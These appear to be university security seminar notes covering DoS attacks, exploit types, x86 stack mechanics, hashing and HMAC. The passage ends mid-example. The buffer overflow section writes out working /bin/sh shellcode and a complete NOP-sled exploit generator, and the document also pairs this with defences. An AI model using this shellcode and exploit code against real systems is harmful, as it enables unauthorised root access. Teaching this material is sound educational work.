Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

A 'pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to its surreptitious nature.

Nuke
A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop. Modern operating systems are usually resistant to these nuke attacks, and online games now have third party "Flood control."

Distributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

Malware can carry DDoS attack mechanisms; one of the more well known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware, and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. These collections of compromised systems are known as botnets.

DDoS tools like stacheldraht still use classic DoS attack methods centered around IP spoofing and amplification, like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes (see next section).

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion, even against their business rivals.

It is important to note the difference between a DDoS and a DoS attack. If an attacker mounts a smurf attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.
The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and the behavior of each attack machine can be stealthier, making it harder to track down and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

Reflected attack

A distributed reflected denial of service attack (DRDoS) involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target.

ICMP Echo Request attacks (Smurf Attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing many hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.

Spoofing

One way of preventing brute force attacks is to instruct network software to accept connections only from trusted IP addresses within a private network. Savvy hackers can send data packets into your network with a "sending address" that appears to belong to one of the trusted internal computers, in a type of attack called spoofing. The receiving computer sends its replies to the internal computer being impersonated, not back to the hackers. But the hackers, knowing that they are working blindly, just keep sending in strings of commands, hoping that everything is working. They might be able to mail themselves a password file, alter Registry values, and so on. This technique is actually quite a serious security risk with network services such as rsh, FTP, and telnet.

Exploits

What is an exploit? Exploitation is defined as manipulation to one's advantage. In a computing context it refers to an attack on a system that makes apt use of a vulnerability in that system or its network. As such, exploits in computer security are based on taking advantage of vulnerabilities/bugs in software and/or hardware.

Take home messages:
- Writing safe code is very difficult.
- Exploiting unsafe code is very tedious and time consuming.

Types of Exploit

Common exploits:
- DDoS
- SQL Injection
- Spoofing
- Code Execution
- Data Access
- Privilege Elevation
- Cross-site scripting
- Buffer overflow

Software exploits fall under a number of categories, which are largely dependent on 3 main factors:

1. The type of vulnerability involved

Microsoft has an acronym, STRIDE, to categorize different threat types. STRIDE stands for:

Spoofing. Spoofing is attempting to gain access to a system by using a false identity. This can be accomplished using stolen user credentials or a false IP address. After the attacker successfully gains access as a legitimate user or host, elevation of privileges or abuse using authorization can begin.

Tampering. Tampering is the unauthorized modification of data, for example as it flows over a network between two computers.

Repudiation.
Repudiation is the ability of users (legitimate or otherwise) to deny that they performed specific actions or transactions. Without adequate auditing, repudiation attacks are difficult to prove.

Information disclosure. Information disclosure is the unwanted exposure of private data.

Denial of service.

Elevation of privilege. Elevation of privilege occurs when a user with limited privileges assumes the identity of a privileged user to gain privileged access to an application. For example, an attacker with limited privileges might elevate his or her privilege level to compromise and take control of a highly privileged and trusted process or account.

2. The location of attack origin (Remote, Local or Client)

Remote exploits target vulnerabilities in network services which listen for connections on a TCP or UDP port. Examples include vulnerabilities in web services (HTTP or HTTPS) or mail services (SMTP, POP3, or IMAP). Remote exploits do not typically require prior access to the target before the exploit can be attempted.

Local exploits target vulnerabilities in entities which are not accessible across a network, such as the operating system kernel or services which do not accept remote connections. Local exploits require prior access to the target, and therefore there must be an existing connection to the target before the exploit can be attempted.

In general, remote exploits target remote command execution vulnerabilities, while local exploits target privilege elevation vulnerabilities.

3. The result of the exploit

The result of an exploit is mostly bound by the hacker's imagination. Common goals/results are data access, elevation of privilege (getting root), Denial of Service (freezing/crashing a system), Spoofing (posing as another person or program) and even arbitrary code execution!

One particular category of exploit involves attacking the user interface, which depends on supplying input to the application through its user interface. The most common such exploit is the input buffer overflow, in which the application fails to properly constrain input length. The unexpected input string from the user can then lead to the supplied data overwriting application instructions or control data, allowing a non-root user to execute arbitrary code and gain root access.
Registers x86 CPU

eip - The instruction pointer.
esp - The stack pointer.
ebp - The base pointer.
eax, ebx, ecx, edx, esi, edi - General purpose registers. These all have intended uses but are essentially general purpose. eax is often used for return values and for system calls.

The e*x registers can also be split into *x, which is the lower 16 bits, *l, which is the lowest 8 bits, and *h, which is the next 8 bits. The e stands for extended and came about when CPUs went from 16 bit to 32 bit.

Assembly Language

Registers are prefixed by %
PUSH %esp

Immediate values (i.e. literal constants, including literal addresses) are prefixed by $

PUSH $0xb

Instructions which involve 2 operands are of the format:


MOV source, destination

All instructions that operate on a number are postfixed with the length of the operands. For example:
MOVL, MOVB, PUSHW

Where L corresponds to long (32 bits), B corresponds to byte (8 bits) and W corresponds to word (16 bits).

NOP (short for No OPeration) - an instruction that effectively does nothing at all. You can put it in your assembly program as a "filler" to force memory alignment.
NOP

Example: adding 1 + 2 and leaving the result in eax.


__asm__( "movl $0x1, %eax\n\t" "addl $0x2, %eax" );

Suppose eax contains a byte offset into an array and esi contains the address of the array. The following puts the value stored at that offset into ebx.
__asm__( "movl (%esi, %eax), %ebx" );

However, the following uses a fixed displacement instead, loading the value at byte offset 2 from the start of the array into ebx.

__asm__( "movl 2(%esi), %ebx" );
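The register naming scheme and the two addressing forms used in this section can be checked with a few lines of arithmetic. The following is a minimal Python sketch, not real register access: `split_register` and `effective_address` are hypothetical helper names, and the values are arbitrary examples chosen for illustration.

```python
def split_register(eax: int) -> dict:
    """Return the 16-bit and 8-bit views of a 32-bit register value."""
    eax &= 0xFFFFFFFF            # keep only 32 bits
    return {
        "eax": eax,
        "ax": eax & 0xFFFF,      # lower 16 bits
        "al": eax & 0xFF,        # lowest 8 bits
        "ah": (eax >> 8) & 0xFF  # the next 8 bits
    }


def effective_address(disp: int = 0, base: int = 0, index: int = 0, scale: int = 1) -> int:
    """Address computed by the AT&T operand disp(base, index, scale)."""
    return (disp + base + index * scale) & 0xFFFFFFFF


parts = split_register(0x12345678)
print({name: hex(value) for name, value in parts.items()})
# {'eax': '0x12345678', 'ax': '0x5678', 'al': '0x78', 'ah': '0x56'}

# (%esi, %eax) with esi = 0x1000 and eax = 8 reads from 0x1008
print(hex(effective_address(base=0x1000, index=8)))
# 2(%esi) with esi = 0x1000 reads from 0x1002
print(hex(effective_address(disp=2, base=0x1000)))
```

Note that the displacement and the index are byte offsets. To index an array of 4-byte elements, the index would be scaled by 4.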
Stack Overview

- A dynamic data structure
- Often used to store temporary information (e.g. during function calls)
- Last In First Out

Accessing the stack:
1. Stack pointer: a register (esp) that points to the top of the stack
2. Base (or frame) pointer: a register (ebp) that points to the bottom of the current stack frame

Two basic operations:
1. Push: add an item to the top of the stack. Adjusts the stack pointer by the size of the item.
2. Pop: remove an item from the top of the stack. Adjusts the stack pointer by the size of the item.

Function Calling Sequence:
1. PUSH to store parameters onto stack
2. CALL to push return address (instruction after CALL) onto stack
3. PUSH to store old %ebp (base pointer) onto stack
4. MOVL to update %ebp with current value of stack pointer
5. Decrement %esp (stack pointer) to allow some space for local variables (on x86 the stack grows towards lower addresses)

(Figure: Seminar/Exploit/StackDiagram.jpg)

First of all the calling function pushes the parameters onto the stack in reverse order. The CALL instruction pushes the address of the next instruction onto the stack. Each function then does the following:
    PUSH %ebp
    MOVL %esp, %ebp

This means the old ebp is at (%ebp), the return address is at 0x4(%ebp), and the parameters start at 0x8(%ebp). After the function is finished it then does:
    MOVL %ebp, %esp
    POP %ebp
    RET

RET pops the value at %esp into the instruction pointer. Often the instruction LEAVE is used instead of the first two lines. As you can see, this relies on the return address being what was pushed on the stack when the CALL instruction was executed. So if we can somehow overwrite this return address we can take control of the program or at the very least crash it.

Function Returning Sequence:
1. MOVL to update %esp (stack pointer) with current value of %ebp (base pointer). This frees the space previously allocated for local variables.
2. POP to retrieve old %ebp from stack (base pointer now back in original position)
3. RET to pop return address from stack
4. POP parameters from stack

(Figure: Seminar/Exploit/StackDiagram2.jpg)

What's this got to do with Exploits?
- Fact: When the function exits, program execution continues at the instruction pointed to by the return address
- Our Aim: to write over the return address while it's stored on the stack
- Result: When the function returns, program execution will continue anywhere you want (perhaps somewhere in memory where you have planted some malicious code!)
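The calling and returning sequences above can be traced with a small model. This is only a sketch in Python, assuming 4-byte stack slots and a stack that grows towards lower addresses; `StackModel`, `call` and `ret` are hypothetical names, and the addresses are made up for illustration.

```python
class StackModel:
    """A toy model of the x86 stack: 4-byte slots, growing downwards."""

    def __init__(self, top: int = 0x1000, ebp: int = 0x2000):
        self.mem = {}      # address -> value
        self.esp = top     # stack pointer
        self.ebp = ebp     # base pointer of the caller

    def push(self, value: int) -> None:
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self) -> int:
        value = self.mem.pop(self.esp)
        self.esp += 4
        return value


def call(stack: StackModel, args, return_address: int, locals_size: int) -> None:
    for arg in reversed(args):       # 1. parameters, in reverse order
        stack.push(arg)
    stack.push(return_address)       # 2. CALL pushes the return address
    stack.push(stack.ebp)            # 3. PUSH %ebp
    stack.ebp = stack.esp            # 4. MOVL %esp, %ebp
    stack.esp -= locals_size         # 5. reserve space for local variables


def ret(stack: StackModel) -> int:
    stack.esp = stack.ebp            # MOVL %ebp, %esp
    stack.ebp = stack.pop()          # POP %ebp
    return stack.pop()               # RET: the next instruction pointer


s = StackModel()
call(s, args=[11, 22], return_address=0x08048400, locals_size=8)
print(hex(s.mem[s.ebp]))       # old ebp at (%ebp)
print(hex(s.mem[s.ebp + 4]))   # return address at 0x4(%ebp)
print(s.mem[s.ebp + 8])        # first parameter at 0x8(%ebp)
print(hex(ret(s)))             # execution resumes at whatever value is stored here
```

The last line is the point of the section: `ret` trusts whatever value sits in the return address slot.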

Writing an exploit

The most useful thing would be to get a shell. We could make it do other things too, but with a shell we can then run whatever we want.

Getting a shell

The easiest way to get a shell would be to use execve. We'll compile a small program so that we can see how execve should be called.
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        char *name[2];

        name[0] = "/bin/sh";
        name[1] = 0;
        execve("/bin/sh", name, 0);
    }

    gcc -static execve.c -o execve
    gdb execve
    disas main

We then need to disassemble the various functions that are called to see exactly what is going on. The important bits:
- %eax contains 0xb.
- The address of the string "/bin/sh" needs to be on the stack for the first parameter.
- ebx contains the pointer to the string.
- ecx contains the pointer to the name array, which has to be in memory somewhere.
- edx contains 0.
- We need to do the function prologue ourselves.
- The SYSENTER instruction is called.

We can reuse the "/bin/sh" string. So all we need to do is put a pointer to it and a 0 on the stack, then point ecx to that. We don't expect this to return, so we can ignore the usual function call set up.

Now we have a problem: what's the address of "/bin/sh"? There is a little trick we can use here. If we execute a call instruction which is just before our string, then the address of the string will be on the stack. So what we can do is jump to the call, then the call goes back to the address after the jump. The code would look like this.
    JMP end                   # jumps to the call
    start:
    POPL %esi                 # store the address in a register
    MOVL %esi, (%esp)         # store the address of the string for the name array
    MOVL $0x0, 0x4(%esp)      # store the null terminator for the name array
    MOVL %esi, %ebx           # address of string for function call
    MOVL %esp, %ecx           # address of name array for function call
    MOVL $0x0, %edx           # 0 for third parameter
    MOVL $0xb, %eax           # needed for the system call
    SYSENTER                  # do the system call
    end:
    CALL start                # puts the address on the stack and jumps to the second instruction
    .string \"/bin/sh\"

This can be compiled using inline assembly with gcc. You can then print out the opcodes using gdb:
    gdb a.out
    disas main
    x/60bx main+14

disas main prints the disassembly of the function main. This will tell you where your assembly starts, on my computer it was main+14. The command x/ prints 60 bytes in hex. You will get something that looks like this:
    0x8048392 <main+14>:  0xeb  0x1f  0x5e  0xb8  0x0b  0x00  0x00  0x00
    0x804839a <main+22>:  0x89  0x34  0x24  0xc7  0x44  0x24  0x04  0x00
    0x80483a2 <main+30>:  0x00  0x00  0x00  0x89  0xf3  0x89  0xe1  0xba
    0x80483aa <main+38>:  0x00  0x00  0x00  0x00  0x8d  0x6e  0x08  0x0f
    0x80483b2 <main+46>:  0x34  0xe8  0xdc  0xff  0xff  0xff  0x2f  0x62
    0x80483ba <end+7>:    0x69  0x6e  0x2f  0x73  0x68  0x00  0xb8  0x00
    0x80483c2 <end+15>:   0x00  0x00  0x00  0x59  0x5d  0x8d  0x61  0xfc
    0x80483ca <end+23>:   0xc3  0x90  0x90  0x90

Note that I used 60 because I'm lazy and didn't work out how long the code was, it actually ends on the line end+7 with the code 0x73 0x68 0x00. You can then type that out into a string in c and put it into a test program just to make sure it works.
    char shellcode[] = {
        "\xeb\x1f\x5e"
        "\xb8\x0b\x00\x00\x00"
        "\x89\x34"
        "\x24\xc7\x44"
        "\x24\x04\x00\x00\x00"
        "\x00\x89\xf3\x89"
        "\xe1\xba\x00\x00\x00\x00"
        "\x8d\x6e\x08"
        "\x0f\x34"
        "\xe8\xdc\xff\xff\xff\x2f"
        "\x62\x69\x6e\x2f\x73\x68\x00"
    };

    int main()
    {
        void (*f)() = (void(*)())&shellcode;
        (*f)();
        return 0;
    }

We now have a problem. Our exploit will most likely rely on strcpy not checking the length of input. Strings are terminated by 0, which means we can't have any zeros in our shell code. So we have to remove all the zeros by rewriting some parts of the assembly.

Guidelines for removing zeros:
- Most instructions which use eax will have a zero, consider using another register. pop and push are exceptions.
- Loading 0 as an immediate value will put a zero in. Consider xoring a register with itself.
- Loading other immediate values may involve zeros: for example, when 0xb is loaded as a 4 byte value, the other three bytes will be zero. Consider using bytes or 2 byte values or adding registers instead of loading immediate values.

After removing the zeros the code looks like this:
    jmp end
    start:
    popl %esi
    xorl %ebx, %ebx
    movl %ebx, 0x4(%esp)
    movl %ebx, %edx
    movl %ebx, 0x8(%esi)
    xor %eax, %eax
    movb $0xb, %al
    movl %esi, (%esp)
    movl %esi, %ebx
    movl %esp, %ecx
    sysenter
    end:
    call start
    .string \"/bin/sh\"

The shell code is:


"\xeb\x1c\x5e\x31\xdb\x89\x5c\x24" "\x04\x89\xda\x89\x5e\x08\xb3\x0b" "\x53\x58\x89\x34\x24\x89\xf3\x89" "\xe1\x8d\x6e\x08\x0f\x34\xe8\xdf" "\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68"

The next step is to put this into a string so that we can actually overflow the buffer. The main thing we are trying to do is to overwrite the return address so that it points to our shellcode. It's really hard to know where our shell code will actually be though, so we put what is called a NOP sled in our buffer. The idea is that the address we overwrite will point to somewhere in the NOP sled. The CPU will execute a whole lot of NOPs and then run our shell code.

(Figure: Seminar/Exploit/Notes/stackoverflow2.png)

The following program puts the NOP sled, shellcode and return address into the environment variable EGG.
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    #define DEFAULT_OFFSET 0
    #define DEFAULT_BUFFER_SIZE 512
    #define NOP 0x90

    char shellcode[] =
        "\xeb\x1c\x5e\x31\xdb"
        "\x88\x5e\x07"
        "\x89\x5c\x24"
        "\x04\x89\xda\x89\x5e\x08\x31\xc0"
        "\xb0\x0b\x89\x34\x24\x89\xf3\x89"
        "\xe1\x0f\x34\xe8\xdf\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";

    unsigned long get_sp(void)
    {
        __asm__("movl %esp,%eax");
    }

    int main(int argc, char *argv[])
    {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i;

        if (argc > 1) bsize = atoi(argv[1]);
        if (argc > 2) offset = atoi(argv[2]);

        if (!(buff = malloc(bsize))) {
            printf("Can't allocate memory.\n");
            exit(0);
        }

        addr = get_sp() - offset;
        printf("Using address: 0x%x\n", addr);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
            *(addr_ptr++) = addr;

        for (i = 0; i < bsize/2; i++)
            buff[i] = NOP;

        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
        for (i = 0; i < strlen(shellcode); i++)
            *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';

        memcpy(buff,"EGG=",4);
        putenv(buff);
        system("/bin/bash");
    }

The program is run using:


./exploit buffer-size offset

buffer-size is the size of the buffer you will be writing. About 100 bigger than the buffer it is going into is a good starting point. Offset is the offset from the stack pointer to use, you will usually have to fiddle with this a bit until it works. From the command line you could now set your buffer as $EGG, or save it to a file and pipe it in or whatever you need to do to write to the buffer.
Other Exploits

format strings
- mainly happen from programmers using printf(buffer) instead of printf("%s", buffer)
- uses printf's %n specifier to write to an arbitrary address in memory
- easy to fix if they occur

heap overflows
- similar to stack overflows but on the heap
- as such cannot overwrite the return address, only other items on the heap

return into libc attacks
- use the system() libc function to call /bin/sh
- use gdb to get the address of the system libc call and set this as the return address
- can work on non-exec stacks
- store variables in environment

function pointer overflows
- if a function pointer is in a struct and there is a buffer overflow on one of the other values in the struct, you can alter the function pointer to point to whatever you want.
Buffer Overflow Countermeasures

As we can see, buffer overflows are critical security vulnerabilities. So how can we counter them?

1. Canary Based

At the highest level of abstraction, compilers can insert a value in the stack called a "canary", which is a hash of the current return pointer on the stack. If a stack variable is overflowed and alters the return address, the canary will no longer match (since it is hashed with the return address and a secret), and at this point the application will stop executing.
- Used to show when a buffer overflow attack has occurred.
- Value is placed on the stack just before the return address.

                      Top of stack (0xFFFFFFFF)
    Stack without canary                 Stack with canary
    ...                                  ...
    parameters passed to function        parameters passed to function
    function's return address (RET)      function's return address (RET)
                                         canary
    local frame pointer (%ebp)           local frame pointer (%ebp)
    local variables                      local variables
    ...                                  ...
                      Bottom of stack (0x00000000)

The stack and where the canary resides in memory

The Terminator canary
- Uses terminators (CR, LF, EOF, NULL) to terminate string operations and hence prevent buffer overflows.
- Canary value is known and could still be exploited.

The Random canary
- Canary value is computed at run-time.
- Value should be logically impossible to pre-determine.

The Random XOR canary
- Same as the random canary, but XORed with control data.
- This prevents tampering with the canary value and control data in the program.
- Still susceptible to the same vulnerabilities as the random canary.

How does the canary work?
- When a buffer overflow attack occurs, the canary value is overwritten as well as the return address.
- When the function finishes, check the canary value. If it has changed, then we cannot trust the return address.

                      Top of stack (0xFFFFFFFF)
    Stack before attack                  Stack after attack
    ...                                  ...
    parameters passed to function        parameters passed to function
    function's return address (RET)      function's return address (RET)
    local frame pointer (%ebp)           local frame pointer (%ebp)
    canary (0xABCDABCD)                  canary (0xFFFFFFFF)
    local variables                      local variables
    ...                                  ...
                      Bottom of stack (0x00000000)

Limitations
- Canary value only protects against buffer overflow attacks. Other attacks, such as function pointer overflowing, can overwrite the return address without modifying the canary value.

2. Non-Executing Stack Based

This defence is quite simple really: it makes the stack non-executable. Older Linux kernels had no mainline support for non-executable stacks, although there were a couple of options. It should also be noted that not all types of attacks can be foiled by using this type of technique: return-to-libc attacks can get past this type of protection.

3. Address Space Randomisation

Address space randomisation randomises the starting point of the stack for each process. It makes bot-style mass exploits harder, since the stack addresses differ from run to run. On 32 bit systems attackers can still work through the limited set of possible addresses, but on 64 bit systems the address range is too large to guess the address.

4. Other
- libsafe
- Firewall: a good firewall rule set that will not allow attackers to connect to the shell that they spawn will help out as well.
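The random canary check described in this section can be modelled in a few lines. The following is a simplified Python sketch, not how a compiler implements it: the frame is a flat byte array laid out as buffer, canary, return address (the saved frame pointer is left out), and `make_frame`, `unchecked_copy` and `canary_intact` are hypothetical names.

```python
import secrets

BUF_SIZE = 8  # size of the local buffer in this toy frame


def make_frame(canary: bytes, return_address: bytes) -> bytearray:
    """Lay out a frame from low to high addresses: buffer, canary, return address."""
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(return_address)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data into the buffer with no length check, like strcpy.

    The data must not be longer than the whole frame in this model.
    """
    frame[0:len(data)] = data


def canary_intact(frame: bytearray, canary: bytes) -> bool:
    """The check made before the function returns."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + len(canary)]) == canary


canary = secrets.token_bytes(4)          # random canary chosen at run-time
frame = make_frame(canary, b"\x10\x20\x30\x40")

unchecked_copy(frame, b"A" * BUF_SIZE)   # fits in the buffer
print(canary_intact(frame, canary))

unchecked_copy(frame, b"A" * (BUF_SIZE + 8))  # runs over the canary and return address
print(canary_intact(frame, canary))      # a changed canary means: do not trust the return address
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without also changing the canary. This matches the limitation noted above: a write that skips over the canary is not detected.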

Week5/NiceNotes
Hashing
Hashing summarises a piece of information: a large input is mapped to a (generally smaller) fixed-size output. Good hash functions distribute their outputs randomly, minimising collisions. Cryptographic hash functions need to be tamper resistant. Breaking a hash function means finding a weakness. Everybody is interested in crypto for ciphers, but not many people are working on hash functions. When MD5 was broken, we didn't have many left. The SHA family still works, and there are a few newer ones, but for a while it was quite scary as we didn't have many hash functions.

Hash Function
Converts an input of an arbitrary-length string of bits into a particular fixed-length output. In general, the output (which is often called "the hash value" or just "the hash") can be used as a fixed-size representation of the input. Many functions can take an arbitrary-length input and return an output of fixed length, but one-way hash functions have additional characteristics that make them one-way:

1. Cryptographic hash functions

A cryptographic hash function is a transformation that takes an input (or 'message') and returns a fixed-size string, which is called the hash value (sometimes termed a message digest, a digital fingerprint, a digest or a checksum). The ideal hash function has three main properties: it is extremely easy to calculate a hash for any given data, it is extremely difficult or almost impossible in a practical sense to calculate a text that has a given hash, and it is extremely unlikely that two different messages, however close, will have the same hash. These hash functions need to be resilient against tampering, as people are actually trying to attack them.

Applications of cryptographic hash functions include message integrity checks, digital signatures, and authentication.

A one-way hash function, H(M), operates on an arbitrary-length pre-image message, M. It returns a fixed-length hash value, h.

    h = H(M), where h is of length m

Properties of a Hash Function


The most important property of a hash function is that it takes a large input and gives a (generally smaller) fixed-size output, i.e. compression: h (a hash function) maps an input x of arbitrary finite bit length to an output h(x) of fixed bit length n.

Good hash functions have some features in common:
- A good hash function should distribute its outputs in a random way in order to minimise collisions (uniform probability distribution).
  - For an arbitrary input, each bit in the output has an equal probability of being a 1 or a 0.
  - It should be just as likely that there will be no collisions, as it is that there will be collisions.
  - Finding an arbitrary pair of messages that have the same hash should require about 2^(n/2) guesses.
- The hash function should be easy to compute, but it should be very difficult to find a text that has a given hash.
  - i.e. given a particular message, finding another message that has the same hash should require about 2^n guesses
  - i.e. given a particular hash value, finding a message that has that hash should require about 2^n guesses

Good cryptographic hashes in addition should be one-way:
- Given M, it is easy to compute h.
- Given h, it is hard to compute M such that H(M) = h.
- Given M, it is hard to find another message, M', such that H(M) = H(M'). This is extremely important, as a cryptographic hash is usually used to provide a fingerprint of M that is unique. If Alice signed M by using a digital signature algorithm on H(M), and Bob could produce M', another message different from M where H(M) = H(M'), then Bob could claim that Alice signed M'.
- It is hard to find two random messages, M and M', such that H(M) = H(M'). (collision resistance)

Undesirable properties include: If the message size is smaller than the size of the hash output, then we have a problem (we can brute force the message easily). It's useless!
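Two of the properties in this section, the fixed-size output and the way a small change in the input spreads across the output bits, are easy to observe with a real hash function. The sketch below uses SHA-256 from Python's standard `hashlib` module. The choice of SHA-256 and the helper names `sha256_hex` and `differing_bits` are assumptions made for illustration.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Hex digest of data under SHA-256."""
    return hashlib.sha256(data).hexdigest()


def differing_bits(a: bytes, b: bytes) -> int:
    """Count the output bits that differ between the hashes of a and b."""
    da = hashlib.sha256(a).digest()
    db = hashlib.sha256(b).digest()
    return sum(bin(x ^ y).count("1") for x, y in zip(da, db))


# Arbitrary-length input, fixed-length output (256 bits = 64 hex characters).
short_digest = sha256_hex(b"a")
long_digest = sha256_hex(b"a" * 1_000_000)
print(len(short_digest), len(long_digest))

# Changing one character of the message changes many of the 256 output bits.
print(differing_bits(b"Give the bearer of this note $1.50",
                     b"Give the bearer of this note $1.51"))
```

For a well-behaved hash, the second number should be somewhere near half of the 256 output bits, in line with each output bit being equally likely to be a 1 or a 0.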

Examples of Hashing
MD5

Message-Digest algorithm 5 (MD5) is a common cryptographic hash function designed by Ronald Rivest in 1991. MD5 has a 128-bit hash value. This relatively small hash size leaves MD5 open to birthday attacks. In 1996 a flaw was found (a collision of the compression function), making its use for cryptographic purposes questionable. In 2004, collisions for the full MD5 were announced, pushing cryptographers to use other algorithms such as SHA-1. MD5 is commonly used for checking download alterations and for password storage. This presents a serious problem, now that MD5 has been compromised.

SHA family

The Secure Hash Algorithm (SHA) family is a family of hash functions developed by the NSA. It is used in many security applications such as TLS, SSL, and SSH. The most commonly used function is SHA-1, which took over from MD5 as the predominant hash function once MD5 was found to be compromised. SHA-1 has a 160-bit hash and is based on similar principles to MD5. It is believed that SHA-1 has now been compromised; however, the SHA-2 functions (longer variants of the SHA family) are still believed to be safe.

Hashed Message Authentication Code (HMAC)

HMAC is a message authentication code (MAC) calculated using a cryptographic hash function in combination with a secret key.

    HMAC_K(m) = h((K ⊕ opad) || h((K ⊕ ipad) || m))

where:
- h is a cryptographic hash function
- K is a secret key padded with extra zeros to match the block size of the hash function
- m is the message to be authenticated
- || denotes concatenation
- ⊕ denotes exclusive or (XOR)
- opad is the outer padding (value = 0x5c5c5c...5c5c)
- ipad is the inner padding (value = 0x363636...3636)

The outer application of the hash function masks the intermediate result of the internal hash. There have been no known extension attacks found against this so far.

We do NOT want to:
- Hash the message, and combine the key after. An attacker would be able to extract the hash and the result, and thus be able to deduce the key.
- Put the key in front of the message, then hash. Depending on the hash function's implementation, an attacker could add data to the end of the message without knowing the key and obtain a valid MAC. This is known as a length extension attack.
- Put the key at the back of the message, then hash. This is weak to collision attacks: because of the chaining effect of the message blocks, two messages that collide in the hash's internal state will also have the same MAC.

Casting Nines

If you take a series of numbers, like
      2978
    + 1356
    + 2489
    + 3217
    ------
     10040

To check that your addition is probably correct, take the digit sum of each number and throw away the nines (i.e. either subtract nine until you have a one digit number, or keep adding the digits until you have a one digit number; these are equivalent):

     2978  ->  8
     1356  ->  6
     2489  ->  5
     3217  ->  4
     -----
    10040  ->  5

Result:
    8 + 6 + 5 + 4 = 23
    23 is not a one digit number so keep going...
    2 + 3 = 5

By casting away the nines, we came up with a check value of 5, which matches our answer value. Hence, our sum is likely correct.
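The check can be written out as a short program. This is a minimal Python sketch with hypothetical function names (`cast_out_nines`, `sum_passes_check`). The four addends total 10040, and the example also shows why the check only says "probably": a wrong total that is off by a multiple of nine, such as 10049, passes as well.

```python
def cast_out_nines(n: int) -> int:
    """Repeatedly sum the decimal digits of n, discarding nines."""
    while n > 9:
        n = sum(int(digit) for digit in str(n))
    return 0 if n == 9 else n


def sum_passes_check(addends, claimed_total: int) -> bool:
    """Compare the check value of the addends with that of the claimed total."""
    expected = cast_out_nines(sum(cast_out_nines(a) for a in addends))
    return expected == cast_out_nines(claimed_total)


numbers = [2978, 1356, 2489, 3217]
print([cast_out_nines(n) for n in numbers])   # [8, 6, 5, 4]
print(sum_passes_check(numbers, 10040))       # True: the correct total
print(sum_passes_check(numbers, 10041))       # False: the error is caught
print(sum_passes_check(numbers, 10049))       # True: off by 9, so the error goes unnoticed
```

In hashing terms, the check value is a very small hash: it is cheap to compute and catches most accidental errors, but collisions are trivial to produce on purpose.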

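Of the examples in this section, the HMAC construction is the easiest to check against a library. The sketch below builds HMAC by hand from the definition given earlier (zero-padded key, ipad 0x36, opad 0x5c) and compares the result with Python's standard `hmac` module. SHA-256 is an assumed choice of hash function, and the key and message are made-up values.

```python
import hashlib
import hmac

BLOCK_SIZE = 64  # block size of SHA-256 in bytes


def hmac_sha256(key: bytes, message: bytes) -> bytes:
    """HMAC_K(m) = h((K xor opad) || h((K xor ipad) || m)) with h = SHA-256."""
    if len(key) > BLOCK_SIZE:
        key = hashlib.sha256(key).digest()    # long keys are hashed first
    key = key.ljust(BLOCK_SIZE, b"\x00")      # pad K with zeros to the block size
    inner_key = bytes(k ^ 0x36 for k in key)  # K xor ipad
    outer_key = bytes(k ^ 0x5C for k in key)  # K xor opad
    inner = hashlib.sha256(inner_key + message).digest()
    return hashlib.sha256(outer_key + inner).digest()


key = b"secret key"
message = b"Give the bearer of this note $1.50"

tag = hmac_sha256(key, message)
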